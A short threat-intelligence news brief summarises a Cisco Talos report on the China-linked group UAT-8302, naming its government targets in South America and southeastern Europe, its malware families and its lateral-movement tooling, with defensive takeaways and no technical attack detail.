A China-nexus hacking group tracked as UAT-8302 has targeted government entities in South America since late 2024 and government agencies in southeastern Europe in 2025, according to a technical analysis from Cisco Talos. The campaign used multiple custom malware families, including NetDraft, CloudSorcerer and VShell.
KEY FACTS
- Targets government entities in South America and southeastern Europe
- Tracking name UAT-8302
- Payloads NetDraft, CloudSorcerer version 3.0 and VShell
- Other tools SNOWLIGHT, SNOWRUST, Stowaway and SoftEther VPN
The report says the group’s post-exploitation activity includes reconnaissance, network mapping, automated scanning with open-source tooling and lateral movement. The attack chains culminate in the deployment of malware that has also been associated with other China-aligned clusters.
The group’s initial access method is not known. Researchers said it is suspected to involve weaponized zero-day and n-day flaws in web applications. After gaining access, the attackers have used a Rust-based version of SNOWLIGHT called SNOWRUST to fetch a VShell payload from a remote server and run it.
Talos said the malware overlap suggests a close operating relationship between UAT-8302 and several previously disclosed threat clusters. The disclosure also notes that the use of proxy and VPN tools can provide alternative backdoor access paths.
WHY IT MATTERS
The activity shows how advanced groups can reuse shared tooling to obscure attribution and speed up intrusions. For defenders, the mix of custom malware, open-source scanning and backup access tools raises the importance of monitoring web applications, internal movement and unusual remote access.